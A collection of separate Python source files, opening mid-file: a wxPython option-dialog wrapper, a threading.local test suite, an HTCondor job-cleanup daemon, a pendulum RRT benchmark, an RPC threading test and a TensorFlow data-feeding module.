ind = option.choices.index(values.get(option.dest,None))
except (ValueError,KeyError):
ind = 0
ctrl.Select(ind)
elif 'multichoice' == option.type:
if sys.platform == 'win32':
perentry = 13
pergap = 0
top = 5
bottom = 0
ysize = min(len(option.multichoices),5)*perentry + \
(min(len(option.multichoices),5)-1)*pergap + top + bottom
else:
perentry = 22
pergap = 3
ysize = min(len(option.multichoices),5)*perentry + \
(min(len(option.multichoices),5)+1)*pergap
ctrl = wx.ListBox(
parent, -1, choices = option.multichoices,
style = wx.LB_EXTENDED | \
wx.LB_HSCROLL | wx.LB_NEEDED_SB,
size = (300,ysize)
)
# print >>sys.stderr, values.get(option.dest),option.multichoices
selected = values.get(option.dest,[])
if isinstance(selected,basestring):
selected = selected.split(',')
for val in selected:
try:
ind = option.multichoices.index(val)
# print >>sys.stderr, val, ind
ctrl.Select(ind)
except ValueError:
continue
else:
if option.text:
ctrl = wx.TextCtrl( parent, -1, "", size = ( 300, 100 ),
style=wx.TE_MULTILINE | wx.TE_PROCESS_ENTER )
elif option.type == 'password':
ctrl = wx.TextCtrl( parent, -1, "", size=(300,-1),
style=wx.TE_PASSWORD )
else:
ctrl = wx.TextCtrl( parent, -1, "", size=(300,-1) )
if option.dest in values:
ctrl.Value = str( values[option.dest] )
sizer.Add( ctrl, 0, wx.ALIGN_LEFT|wx.ALL, 5 )
elif option.action in ( 'store_true', 'store_false' ):
ctrl = wx.CheckBox( parent, -1, "", size = ( 300, -1 ) )
if option.dest in values:
ctrl.Value = values[option.dest]
sizer.Add( ctrl, 0, wx.ALIGN_LEFT|wx.ALL, 5 )
ctrl.SetHelpText( option.help )
controls[ option ] = ctrl
return controls
def _getOptions( self ):
option_values = {}
for option, ctrl in self.option_controls.iteritems():
if option.type == 'multichoice':
option_values[option] = ','.join(map(lambda i: option.multichoices[i],ctrl.GetSelections()))
else:
option_values[option] = ctrl.GetValue()
return option_values
def _getArgs( self ):
if self.args_ctrl == None:
return []
args_buff = self.args_ctrl.Value
args = re.findall( r'(?:((?:(?:\w|\d)+)|".*?"))\s*', args_buff )
return args
def getOptionsAndArgs( self ):
'''Returns the tuple ( options, args )
options - a dictionary of option names and values
args - a sequence of args'''
option_values = self._getOptions()
args = self._getArgs()
return option_values, args
class EmptyNotNoneOptionError (optparse.OptionError):
"""
Raised if a notNone option has no value.
"""
class UserCheckOptionError (optparse.OptionError):
"""
Raised if a user supplied values check fails.
"""
class OptionParserGUI( OptionParser ):
def __init__( self, *args, **kwargs ):
if wx.GetApp() is None:
self.app = wx.App( False )
self.args = False
if kwargs.has_key('args'):
self.args = kwargs['args']
del kwargs['args']
dotfile = None
if 'dotfile' in kwargs:
dotfile = kwargs['dotfile']
del kwargs['dotfile']
OptionParser.__init__( self, *args, **kwargs )
self.dotfile = self.find_dotfile(dotfile)
def find_dotfile(self,base=None):
if not base:
base = self.get_prog_name()
#print base
if 'HOMEPATH' in os.environ and 'HOMEDRIVE' in os.environ:
home = os.environ['HOMEDRIVE'] + os.environ['HOMEPATH']
elif 'HOME' in os.environ:
home = os.environ['HOME']
else:
raise RuntimeError("Can't find home directory!")
if base.endswith('.exe'):
dotfile = base[:-4]+'.ini'
elif base.endswith('.py'):
dotfile = base[:-3]+'.ini'
else:
dotfile = base+'.ini'
return os.path.join(home,"."+dotfile)
def parse_args( self, args = None, values = None, opts = None ):
'''
This is the heart of it all - overrides optparse.OptionParser.parse_args
@param arg is irrelevant and thus ignored,
it\'s here only for interface compatibility
'''
if opts != None:
initvals = {}
for g,o in self.iteropts():
# print repr(g),repr(o),o.dest
if o.dest and hasattr(opts,o.dest):
initvals[o.dest] = getattr(opts,o.dest)
set_values = initvals
else:
set_values = None
if opts == None:
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("VERSION") or config.get("VERSION","VERSION") != self.version:
os.unlink(self.dotfile)
config=ConfigParser()
if config.has_section("LastValue"):
for g,o in self.iteropts():
if o.dest and o.remember and config.has_option("LastValue",o.dest):
if set_values == None:
set_values = {}
value = pickle.loads(config.get("LastValue",o.dest))
if o.type == 'multichoice':
set_values[o.dest] = value.split(',')
elif o.type in ('savefile','savedir','file'):
set_values[o.dest] = quotedifnec(value)
elif o.type in ('files',):
set_values[o.dest] = quotedlistifnec(value)
else:
set_values[o.dest] = value
good = False
while not good:
good = True
dlg = OptparseDialog( option_parser = self, values = set_values, args = self.args )
dlg.state = None
dlg_result = dlg.ShowModal()
if dlg_result == wx.ID_CANCEL and dlg.state == None:
raise UserCancelledError( 'User has canceled' )
if dlg_result == wx.ID_CANCEL and dlg.state == 'Reset':
good = False
if os.path.exists(self.dotfile):
os.unlink(self.dotfile)
set_values = None
continue
assert dlg_result == wx.ID_OK
if values is None:
values = self.get_default_values()
option_values, args = dlg.getOptionsAndArgs()
set_values = {'-args-':''}
for option, value in option_values.iteritems():
set_values[option.dest] = value
if dlg.args_ctrl:
set_values['-args-'] = dlg.args_ctrl.Value
optmap = {}
for option in self.option_list:
optmap[str(option)] = option
for gr in self.option_groups:
for option in gr.option_list:
optmap[str(option)] = option
for option, value in option_values.iteritems():
if option.action in ('store_true','store_false'):
setattr( values, option.dest, value )
continue
if option.takes_value() is False:
value = None
if isinstance(value,unicode):
value = str(value)
if option.notNone and (value == None or value == ''):
self.error("%s: notNone option is empty"%(option,),
option,exit=False)
good = False
break
try:
option.process( option, value, values, self )
except optparse.OptionValueError, e:
self.error(e.msg,option,exit=False)
good = False
break
config=ConfigParser()
if os.path.exists(self.dotfile):
config.read(self.dotfile)
if not config.has_section("LastValue"):
config.add_section("LastValue")
if not config.has_section("VERSION"):
config.add_section("VERSION")
config.set("VERSION","VERSION",self.version)
for g,o in self.iteropts():
if o.remember:
if getattr(values,o.dest) not in (None,""):
config.set("LastValue",o.dest,pickle.dumps((getattr(values,o.dest))))
else:
config.remove_option("LastValue",o.dest)
try:
wh = open(self.dotfile,'wb')
config.write(wh)
wh.close()
except IOError:
pass
return values, args
def error( self, msg, option=None, exit=True):
msg = re.sub(r"u'","'",msg)
if ':' in msg:
msg = msg.split(':',1)[1].strip()
if option:
msg = option.name+": "+msg
dlg = wx.MessageDialog( None, msg, 'Error!', wx.ICON_ERROR )
dlg.ShowModal()
if exit:
sys.exit(2)
return
class ProgressGUI(Progress):
def __init__(self,title,*args,**kwargs):
super(ProgressGUI,self).__init__(*args,**kwargs)
self.title = title
self.dialog = None
self.lock = threading.Lock()
def init(self,message):
if wx.GetApp() is None:
self.app = wx.App( False )
if self.dialog:
return
args = (self.title,message+" "*(60-len(message)), 1001)
t = threading.Thread(target=self.start, args=args)
t.start()
while True:
self.lock.acquire()
if self.dialog:
self.lock.release()
break
self.lock.release()
time.sleep(1)
def start(self,*args):
self.lock.acquire()
self.dialog = wx.ProgressDialog(style=0,*args)
self.lock.release()
def initprogressbar(self, message):
self.init(message)
self.updateprogressbar(0)
# self.dialog.Update(0,message)
def initbar(self, message):
self.init(message)
self.updatebar()
# self.dialog.Update(0,message)
def updateprogressbar(self,value):
self.dialog.Update(value)
def updatebar(self):
self.dialog.Pulse()
|
test_threading_local.py
|
import sys
import unittest
from doctest import DocTestSuite
from test import support
from test.support import threading_helper
import weakref
# import gc
# Modules under test
import _thread
import threading
import _threading_local
class Weak(object):
pass
def target(local, weaklist):
weak = Weak()
local.weak = weak
weaklist.append(weakref.ref(weak))
class BaseLocalTest:
@unittest.skip("TODO: RUSTPYTHON, flaky test")
def test_local_refs(self):
self._local_refs(20)
self._local_refs(50)
self._local_refs(100)
def _local_refs(self, n):
local = self._local()
weaklist = []
for i in range(n):
t = threading.Thread(target=target, args=(local, weaklist))
t.start()
t.join()
del t
# gc.collect()
self.assertEqual(len(weaklist), n)
# XXX _threading_local keeps the local of the last stopped thread alive.
deadlist = [weak for weak in weaklist if weak() is None]
self.assertIn(len(deadlist), (n-1, n))
# Assignment to the same thread local frees it sometimes (!)
local.someothervar = None
# gc.collect()
deadlist = [weak for weak in weaklist if weak() is None]
self.assertIn(len(deadlist), (n-1, n), (n, len(deadlist)))
def test_derived(self):
        # Issue 3088: if there is a thread switch inside the __init__
# of a threading.local derived class, the per-thread dictionary
# is created but not correctly set on the object.
# The first member set may be bogus.
import time
class Local(self._local):
def __init__(self):
time.sleep(0.01)
local = Local()
def f(i):
local.x = i
# Simply check that the variable is correctly set
self.assertEqual(local.x, i)
with threading_helper.start_threads(threading.Thread(target=f, args=(i,))
for i in range(10)):
pass
def test_derived_cycle_dealloc(self):
# http://bugs.python.org/issue6990
class Local(self._local):
pass
locals = None
passed = False
e1 = threading.Event()
e2 = threading.Event()
def f():
nonlocal passed
# 1) Involve Local in a cycle
cycle = [Local()]
cycle.append(cycle)
cycle[0].foo = 'bar'
# 2) GC the cycle (triggers threadmodule.c::local_clear
# before local_dealloc)
del cycle
# gc.collect()
e1.set()
e2.wait()
# 4) New Locals should be empty
passed = all(not hasattr(local, 'foo') for local in locals)
t = threading.Thread(target=f)
t.start()
e1.wait()
# 3) New Locals should recycle the original's address. Creating
# them in the thread overwrites the thread state and avoids the
# bug
locals = [Local() for i in range(10)]
e2.set()
t.join()
self.assertTrue(passed)
# TODO: RUSTPYTHON, __new__ vs __init__ cooperation
@unittest.expectedFailure
def test_arguments(self):
# Issue 1522237
class MyLocal(self._local):
def __init__(self, *args, **kwargs):
pass
MyLocal(a=1)
MyLocal(1)
self.assertRaises(TypeError, self._local, a=1)
self.assertRaises(TypeError, self._local, 1)
def _test_one_class(self, c):
self._failed = "No error message set or cleared."
obj = c()
e1 = threading.Event()
e2 = threading.Event()
def f1():
obj.x = 'foo'
obj.y = 'bar'
del obj.y
e1.set()
e2.wait()
def f2():
try:
foo = obj.x
except AttributeError:
# This is expected -- we haven't set obj.x in this thread yet!
self._failed = "" # passed
else:
self._failed = ('Incorrectly got value %r from class %r\n' %
(foo, c))
sys.stderr.write(self._failed)
t1 = threading.Thread(target=f1)
t1.start()
e1.wait()
t2 = threading.Thread(target=f2)
t2.start()
t2.join()
# The test is done; just let t1 know it can exit, and wait for it.
e2.set()
t1.join()
self.assertFalse(self._failed, self._failed)
def test_threading_local(self):
self._test_one_class(self._local)
def test_threading_local_subclass(self):
class LocalSubclass(self._local):
"""To test that subclasses behave properly."""
self._test_one_class(LocalSubclass)
def _test_dict_attribute(self, cls):
obj = cls()
obj.x = 5
self.assertEqual(obj.__dict__, {'x': 5})
with self.assertRaises(AttributeError):
obj.__dict__ = {}
with self.assertRaises(AttributeError):
del obj.__dict__
def test_dict_attribute(self):
self._test_dict_attribute(self._local)
def test_dict_attribute_subclass(self):
class LocalSubclass(self._local):
"""To test that subclasses behave properly."""
self._test_dict_attribute(LocalSubclass)
# TODO: RUSTPYTHON, cycle detection/collection
@unittest.expectedFailure
def test_cycle_collection(self):
class X:
pass
x = X()
x.local = self._local()
x.local.x = x
wr = weakref.ref(x)
del x
# gc.collect()
self.assertIsNone(wr())
class ThreadLocalTest(unittest.TestCase, BaseLocalTest):
_local = _thread._local
class PyThreadingLocalTest(unittest.TestCase, BaseLocalTest):
_local = _threading_local.local
def test_main():
suite = unittest.TestSuite()
suite.addTest(DocTestSuite('_threading_local'))
suite.addTest(unittest.makeSuite(ThreadLocalTest))
# suite.addTest(unittest.makeSuite(PyThreadingLocalTest))
local_orig = _threading_local.local
def setUp(test):
_threading_local.local = _thread._local
def tearDown(test):
_threading_local.local = local_orig
suite.addTest(DocTestSuite('_threading_local',
setUp=setUp, tearDown=tearDown)
)
support.run_unittest(suite)
if __name__ == '__main__':
test_main()
|
cscleaner.py
|
from multiprocessing import Process
import time
import htcondor
import json
import logging
import config
import socket
from sqlalchemy import create_engine
from sqlalchemy.orm import Session
from sqlalchemy.ext.automap import automap_base
def cleanUp():
while(True):
        # Setup condor classes and database connections
condor_s = htcondor.Schedd()
condor_c = htcondor.Collector()
Base = automap_base()
local_hostname = socket.gethostname()
engine = create_engine("mysql://" + config.db_user + ":" + config.db_password + "@" + config.db_host + ":" + str(config.db_port) + "/" + config.db_name)
Base.prepare(engine, reflect=True)
session = Session(engine)
#setup database objects
Job = Base.classes.condor_jobs
archJob = Base.classes.archived_condor_jobs
Resource = Base.classes.condor_resources
archResource = Base.classes.archived_condor_resources
#Part 1 Clean up job ads
condor_job_list = condor_s.query()
# this query asks for only jobs that contain the local hostname as part of their JobID
db_job_list = session.query(Job).filter(Job.GlobalJobId.like("%" + local_hostname+ "%"))
#loop through the condor data and make a list of GlobalJobId
#then loop through db list checking if they are in the aforementioned list
condor_name_list = []
for ad in condor_job_list:
ad_dict = dict(ad)
condor_name_list.append(ad_dict['GlobalJobId'])
for job in db_job_list:
if job.GlobalJobId not in condor_name_list:
#job is missing from condor, clean it up
logging.info("Found Job missing from condor: %s, cleaning up." % job.GlobalJobId)
job_dict = job.__dict__
logging.info(job_dict)
session.delete(job)
                job_dict.pop('_sa_instance_state', None) # metadata not relevant to the job ad; must trim to init with kwargs
new_arch_job = archJob(**job_dict)
session.merge(new_arch_job)
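                # merge() rather than add(): it reconciles by primary key, so
                # re-processing the same vanished job stays idempotent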
#Part 2 Clean up machine/resource ads
condor_machine_list = condor_c.query()
        # this query asks for only resources containing the local hostname
db_machine_list = session.query(Resource).filter(Resource.Name.like("%" + local_hostname+ "%"))
condor_name_list = []
for ad in condor_machine_list:
ad_dict = dict(ad)
condor_name_list.append(ad_dict['Name'])
for machine in db_machine_list:
if machine.Name not in condor_name_list:
#machine is missing from condor, clean it up
logging.info("Found machine missing from condor: %s, cleaning up." % machine.Name)
machine_dict = machine.__dict__
logging.info(machine_dict)
session.delete(machine)
del machine_dict['_sa_instance_state']
new_arch_machine = archResource(**machine_dict)
session.merge(new_arch_machine)
session.commit()
time.sleep(120) #sleep 2 mins, should probably add this as a config option
if __name__ == '__main__':
logging.basicConfig(filename=config.cleaner_log_file,level=logging.DEBUG)
processes = []
p_cleanup = Process(target=cleanUp)
processes.append(p_cleanup)
# Wait for keyboard input to exit
try:
for process in processes:
process.start()
while(True):
            for idx, process in enumerate(processes):
                if not process.is_alive():
                    logging.error("%s process died!" % process.name)
                    logging.error("Restarting %s process..." % process.name)
                    # A multiprocessing.Process can only be started once;
                    # build a fresh Process before restarting.
                    processes[idx] = Process(target=cleanUp)
                    processes[idx].start()
time.sleep(1)
time.sleep(10)
except (SystemExit, KeyboardInterrupt):
logging.error("Caught KeyboardInterrupt, shutting down threads and exiting...")
for process in processes:
try:
process.join()
            except Exception:
logging.error("failed to join process %s" % process.name)
|
torquelim-11-07.py
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright (C) 2013 Stephane Caron <stephane.caron@normalesup.org>
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Run a benchmark for the inverted pendulum with torque limits (11, 7) Nm.
Planners:
- VIP-RRT
- 1NN-RRT
- 10NN-RRT
- 100NN-RRT
"""
import datetime
import numpy
import os
import pickle
import sys
sys.path.append('.')
sys.path.append('..')
from multiprocessing import Process
from rrtcmp import TestBed
from rrtcmp import TorqueSampleState
from rrtcmp import RRT, VIP_RRT
class Benchmark(object):
pass
benchmark = Benchmark()
benchmark.tunings = {
'sims_per_case': 1, # Number of runs
'random_seed': 42, # seed for random number generation
# Precision
'spatial_prec': 1e-2, # [m]
'time_prec': 1e-2, # [s] smallest integration timestep
# Extension parameters
'max_iter': 6000, # max num. of extensions
'max_simu_duration': 1e4, # max duration for each run in seconds
'modulo': 5, # steer to goal every $modulo extensions
'rrt_neigh_size': 40, # num. of neighbors
'nb_traj_samples': 20, # num. of traj. tested / neighbor / extension
'max_traj_duration': 1.0, # max traj duration for each trajectory
# Pendulum characteristics
'torque_limits': [11., 7.], # [N.m]
'Vmax': 50, # [rad/s^2]
# RRT-specific
'try_exact_steering': False, # use LinAcc steering to goal at every step?
}
benchmark.sims_per_case_max = 40
benchmark.max_iter_max = 10000
benchmark.cases = [
{'run_vip': False}, # defaults # (40 neighbor + VIP) x 40 sims
{'rrt_neigh_size': 1, 'sims_per_case': 20},
{'rrt_neigh_size': 1, 'sims_per_case': 20, 'start_index': 20},
{'rrt_neigh_size': 10, 'sims_per_case': 20},
{'rrt_neigh_size': 10, 'sims_per_case': 20, 'start_index': 20},
{'rrt_neigh_size': 100, 'sims_per_case': 20},
{'rrt_neigh_size': 100, 'sims_per_case': 20, 'start_index': 20},
]
benchmark.trace_dir = './traces/%s' % str(datetime.datetime.today())
sims_per_case_max = benchmark.sims_per_case_max
max_iter_max = benchmark.max_iter_max
Vmax, nb_dof = benchmark.tunings['Vmax'], 2 # the pendulum has two DOFs
X1 = numpy.random.random((sims_per_case_max, max_iter_max, nb_dof))
X2 = numpy.random.random((sims_per_case_max, max_iter_max, nb_dof))
benchmark.rand_poses = numpy.pi * (2. * X1 - 1.)
benchmark.rand_velocities = Vmax * (2. * X2 - 1.)
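# X1 and X2 are uniform in [0, 1), so the affine maps above yield poses
# uniform in [-pi, pi) and velocities uniform in [-Vmax, Vmax) per DOF.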
def run_and_log(benchmark, case_params):
dump_file = '%s/dump-%d.pkl' % (benchmark.trace_dir, os.getpid())
StatePlannerList = [(TorqueSampleState, RRT)]
if 'run_vip' in case_params.keys() and case_params['run_vip']:
StatePlannerList.append((TorqueSampleState, VIP_RRT))
test = TestBed(dump_file, benchmark.tunings, custom_tunings=case_params,
StatePlannerList=StatePlannerList)
test.run(benchmark.rand_poses, benchmark.rand_velocities)
if __name__ == "__main__":
os.mkdir(benchmark.trace_dir)
for test_case in benchmark.cases:
Process(target=run_and_log, args=(benchmark, test_case)).start()
with open('%s/poses.pkl' % benchmark.trace_dir, 'w') as f:
pickle.dump(benchmark.rand_poses, f)
with open('%s/velocities.pkl' % benchmark.trace_dir, 'w') as f:
pickle.dump(benchmark.rand_velocities, f)
|
test_rpc.py
|
''' Test whether rpc works in a multithreaded environment '''
from spartan import rpc
from spartan import util
import threading
from multiprocessing.pool import ThreadPool
port = 7278
host = "localhost"
# number of threads we launch to send requests from one client
NUM_THREADS = 4
class EchoServer(object):
def __init__(self, server):
self._server = server
self._kernel_threads = ThreadPool(processes=1)
def ping(self, req, handle):
handle.done(req)
def run_kernel(self, req, handle):
        # simulate the actual kernel run; send the response from a different thread.
self._kernel_threads.apply_async(self._run_kernel, args=(req, handle))
def _run_kernel(self, req, handle):
handle.done(req)
def shutdown(self, req, handle):
util.log_info("Server shutdown")
handle.done()
threading.Thread(target=self._shutdown).start()
def _shutdown(self):
self._server.shutdown()
client = rpc.connect(host, port)
server = rpc.listen(host, port)
server.register_object(EchoServer(server))
def server_fn():
''' Server thread '''
server.serve()
def client_fn():
''' Client thread '''
for i in range(200):
assert client.ping("spartan").wait() == "spartan"
assert client.run_kernel("kernel").wait() == "kernel"
def test_rpc():
client_threads = [threading.Thread(target=client_fn) for i in range(NUM_THREADS)]
server_thread = threading.Thread(target=server_fn)
    # Dedicated client used to shut down the server
client = rpc.connect(host, port)
server_thread.start()
for c in client_threads:
c.start()
for c in client_threads:
c.join()
    # Shut down the server
client.shutdown()
server_thread.join()
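# Hedged runner sketch: allows executing this test directly as a script
# (a test framework would otherwise discover and call test_rpc()).
if __name__ == '__main__':
    test_rpc()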
|
data_flow.py
|
# -*- coding: utf-8 -*-
from __future__ import division, print_function, absolute_import
import numpy as np
import threading
try:
# Python 2
import Queue as queue
except Exception:
# Python 3
import queue
import tensorflow.compat.v1 as tf
from . import utils
class DataFlow(object):
""" Data Flow.
Base class for using real time pre-processing and controlling data flow.
Supports pipelining for faster computation.
Arguments:
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
        shuffle: `bool`. If True, data will be shuffled.
        continuous: `bool`. If True, when an epoch is over, the same data
            will be fed again.
        ensure_data_order: `bool`. Ensure that data order is kept when using
            'next' to retrieve data (processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
daug_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
"""
def __init__(self, coord, num_threads=8, max_queue=32, shuffle=False,
continuous=False, ensure_data_order=False,
dprep_dict=None, daug_dict=None):
self.coord = coord
self.num_threads = num_threads
self.max_queue = max_queue
self.shuffle = shuffle
self.continuous = continuous
if ensure_data_order:
self.num_threads = 1
self.max_queue = 1
self.dprep_dict = dprep_dict
self.daug_dict = daug_dict
self.interrupted = False
class FeedDictFlow(DataFlow):
""" FeedDictFlow.
    Generate a stream of batches from a dataset. It uses two queues: one
    generates batches of data ids, and the other loads data and applies
    pre-processing. If continuous is `True`, the data flow never ends until
    `stop` is invoked or `coord` interrupts the threads.
Arguments:
feed_dict: `dict`. A TensorFlow formatted feed dict (with placeholders
as keys and data as values).
coord: `Coordinator`. A Tensorflow coordinator.
num_threads: `int`. Total number of simultaneous threads to process data.
max_queue: `int`. Maximum number of data stored in a queue.
        shuffle: `bool`. If True, data will be shuffled.
        continuous: `bool`. If True, when an epoch is over, the same data
            will be fed again.
        ensure_data_order: `bool`. Ensure that data order is kept when using
            'next' to retrieve data (processing will be slower).
dprep_dict: dict. Optional data pre-processing parameter for performing
real time data pre-processing. Keys must be placeholders and values
`DataPreprocessing` subclass object.
daug_dict: dict. Optional data augmentation parameter for performing
real time data augmentation. Keys must be placeholders and values
`DataAugmentation` subclass object.
        index_array: `list`. An optional list of indices to use instead of the
            whole dataset's indexes (useful for a validation split).
"""
def __init__(self, feed_dict, coord, batch_size=128, num_threads=8,
max_queue=32, shuffle=False, continuous=False,
ensure_data_order=False, dprep_dict=None, daug_dict=None,
index_array=None):
super(FeedDictFlow, self).__init__(coord, num_threads, max_queue,
shuffle, continuous,
ensure_data_order,
dprep_dict,
daug_dict)
self.feed_dict = feed_dict
self.batch_size = batch_size
self.n_samples = len(utils.get_dict_first_element(feed_dict))
# Queue holding batch ids
self.batch_ids_queue = queue.Queue(self.max_queue)
# Queue holding data ready feed dicts
self.feed_dict_queue = queue.Queue(self.max_queue)
# Create samples index array
self.index_array = np.arange(self.n_samples)
if index_array is not None:
self.index_array = index_array
self.n_samples = len(index_array)
# Create batches
self.batches = self.make_batches()
self.reset_batches()
# Data Recording
self.data_status = DataFlowStatus(self.batch_size, self.n_samples)
def next(self, timeout=None):
""" next.
Get the next feed dict.
Returns:
A TensorFlow feed dict, or 'False' if it has no more data.
"""
self.data_status.update()
return self.feed_dict_queue.get(timeout=timeout)
def start(self, reset_status=True):
""" start.
Arguments:
            reset_status: `bool`. If True, the `DataFlowStatus` will be reset.
Returns:
"""
# Start to process data and fill queues
self.clear_queues()
self.interrupted = False
# Reset Data Status
if reset_status:
self.data_status.reset()
# Only a single thread needed for batches ids
bi_threads = [threading.Thread(target=self.fill_batch_ids_queue)]
# Multiple threads available for feed batch pre-processing
fd_threads = [threading.Thread(target=self.fill_feed_dict_queue)
for i in range(self.num_threads)]
self.threads = bi_threads + fd_threads
for t in self.threads:
t.daemon = True
t.start()
def stop(self):
""" stop.
Stop the queue from creating more feed_dict.
"""
# Send stop signal to processing queue
for i in range(self.num_threads):
self.batch_ids_queue.put(False)
# Launch a Thread to wait for processing scripts to finish
t = threading.Thread(target=self.wait_for_threads)
t.daemon = True
t.start()
def reset(self):
""" reset.
Reset batch index.
"""
self.batch_index = -1
def interrupt(self):
# Send interruption signal to processing queue
self.interrupted = True
self.clear_queues()
def fill_feed_dict_queue(self):
while not self.coord.should_stop() and not self.interrupted:
batch_ids = self.batch_ids_queue.get()
if batch_ids is False:
break
data = self.retrieve_data(batch_ids)
# Apply augmentation according to daug dict
if self.daug_dict:
for k in self.daug_dict:
data[k] = self.daug_dict[k].apply(data[k])
# Apply preprocessing according to dprep dict
if self.dprep_dict:
for k in self.dprep_dict:
data[k] = self.dprep_dict[k].apply(data[k])
#all prepped, put the data into the queue
self.feed_dict_queue.put(data)
def fill_batch_ids_queue(self):
while not self.coord.should_stop() and not self.interrupted:
ids = self.next_batch_ids()
if ids is False:
break
self.batch_ids_queue.put(ids)
    def next_batch_ids(self):
        self.batch_index += 1
        if self.batch_index == len(self.batches):
            if not self.continuous:
                self.stop()
                return False
            self.reset_batches()
            # reset_batches() leaves batch_index at -1, which would re-serve
            # the last batch; start the new epoch at the first batch instead.
            self.batch_index = 0
        batch_start, batch_end = self.batches[self.batch_index]
        return self.index_array[batch_start:batch_end]
def retrieve_data(self, batch_ids):
feed_batch = {}
for key in self.feed_dict:
feed_batch[key] = \
utils.slice_array(self.feed_dict[key], batch_ids)
return feed_batch
def reset_batches(self):
if self.shuffle:
self.shuffle_samples()
# Generate new batches
self.batches = self.make_batches()
self.batch_index = -1
def make_batches(self):
return utils.make_batches(self.n_samples, self.batch_size)
def shuffle_samples(self):
np.random.shuffle(self.index_array)
def wait_for_threads(self):
# Wait for threads to finish computation (max 120s)
self.coord.join(self.threads)
# Send end signal to indicate no more data in feed queue
self.feed_dict_queue.put(False)
def clear_queues(self):
""" clear_queues.
Clear queues.
"""
while not self.feed_dict_queue.empty():
self.feed_dict_queue.get()
while not self.batch_ids_queue.empty():
self.batch_ids_queue.get()
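# Hedged usage sketch for FeedDictFlow; the placeholder and array names below
# (X_ph, Y_ph, X_data, Y_data, sess, train_op) are illustrative assumptions,
# not part of this module:
#
#     coord = tf.train.Coordinator()
#     flow = FeedDictFlow({X_ph: X_data, Y_ph: Y_data}, coord, batch_size=64)
#     flow.start()
#     feed = flow.next()
#     while feed is not False:   # next() yields False once the flow stops
#         sess.run(train_op, feed_dict=feed)
#         feed = flow.next()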
class TFRecordsFlow(DataFlow):
def __init__(self, coord):
super(TFRecordsFlow, self).__init__(coord)
raise NotImplementedError
class DataFlowStatus(object):
""" Data Flow Status
Simple class for recording how many data have been processed.
"""
def __init__(self, batch_size, n_samples):
self.step = 0
self.epoch = 0
self.current_iter = 0
self.batch_size = batch_size
self.n_samples = n_samples
def update(self):
self.step += 1
self.current_iter = min(self.step * self.batch_size, self.n_samples)
if self.current_iter == self.n_samples:
self.epoch += 1
self.step = 0
def reset(self):
self.step = 0
self.epoch = 0
class ArrayFlow(object):
""" ArrayFlow.
Convert array samples to tensors and store them in a queue.
Arguments:
X: `array`. The features data array.
Y: `array`. The targets data array.
multi_inputs: `bool`. Set to True if X has multiple input sources (i.e.
X is a list of arrays).
batch_size: `int`. The batch size.
shuffle: `bool`. If True, data will be shuffled.
Returns:
The `X` and `Y` data tensors or a list(`X`) and `Y` data tensors if
multi_inputs is True.
"""
def __init__(self, X, Y, multi_inputs=False, batch_size=32, shuffle=True,
capacity=None):
# Handle multiple inputs
if not multi_inputs:
X = [X]
if not capacity:
            capacity = batch_size * 8
X = [np.array(x) for x in X]
self.X = X
self.Xlen = len(X[0])
Y = np.array(Y)
self.Y = Y
# Create X placeholders
self.tensorX = [tf.placeholder(
dtype=tf.float32,
shape=[None] + list(utils.get_incoming_shape(x)[1:]))
for x in X]
# Create Y placeholders
self.tensorY = tf.placeholder(
dtype=tf.float32,
shape=[None] + list(utils.get_incoming_shape(Y)[1:]))
# FIFO Queue for feeding data
self.queue = tf.FIFOQueue(
dtypes=[x.dtype for x in self.tensorX] + [self.tensorY.dtype],
capacity=capacity)
self.enqueue_op = self.queue.enqueue(self.tensorX + [self.tensorY])
self.batch_size = batch_size
self.multi_inputs = multi_inputs
self.shuffle = shuffle
def iterate(self, X, Y, batch_size):
while True:
# Shuffle array if specified
if self.shuffle:
idxs = np.arange(0, len(X[0]))
np.random.shuffle(idxs)
X = [x[idxs] for x in X]
Y = Y[idxs]
# Split array by batch
for batch_idx in range(0, self.Xlen, batch_size):
batchX = [x[batch_idx:batch_idx + batch_size] for x in X]
batchY = Y[batch_idx:batch_idx + batch_size]
yield batchX, batchY
def get(self):
# get data from the queue
dequeue = self.queue.dequeue()
if self.multi_inputs:
return dequeue[:-1], dequeue[-1]
else:
return dequeue[0], dequeue[1]
def launch_threads(self, session, num_threads=1):
threads = []
for i in range(num_threads):
t = threading.Thread(target=self.thread_main, args=(session,))
t.daemon = True
t.start()
threads.append(t)
return threads
def thread_main(self, sess):
for dataX, dataY in self.iterate(self.X, self.Y, self.batch_size):
feed_dict = {self.tensorY: dataY}
for i, x in enumerate(self.tensorX):
feed_dict[x] = dataX[i]
sess.run(self.enqueue_op, feed_dict=feed_dict)
def generate_data_tensor(X, Y, batch_size, shuffle=True, num_threads=1,
capacity=None):
    # TODO: Add a way with no batch?
    # TODO: Set threads to the number of CPUs of the machine
cr = None
if capacity is None:
capacity = batch_size * num_threads * 4
if isinstance(X, tf.Tensor) and isinstance(Y, tf.Tensor):
# Optional Image and Label Batching
if shuffle:
X, Y = tf.train.shuffle_batch([X, Y], batch_size=batch_size,
min_after_dequeue=batch_size,
capacity=capacity,
num_threads=num_threads)
else:
X, Y = tf.train.batch([X, Y], batch_size=batch_size,
capacity=capacity,
num_threads=num_threads)
# Array Input
elif X is not None and Y is not None:
X_shape = list(np.shape(X))
Y_shape = list(np.shape(Y))
# Create a queue using feed_dicts
cr = ArrayFlow(X, Y, batch_size=batch_size, shuffle=shuffle,
capacity=capacity)
X, Y = cr.get()
# Assign a shape to tensors
X_reshape = [-1] + X_shape[1:] if len(X_shape[1:]) > 0 else [-1, 1]
Y_reshape = [-1] + Y_shape[1:] if len(Y_shape[1:]) > 0 else [-1, 1]
X = tf.reshape(X, X_reshape)
Y = tf.reshape(Y, Y_reshape)
return X, Y, cr
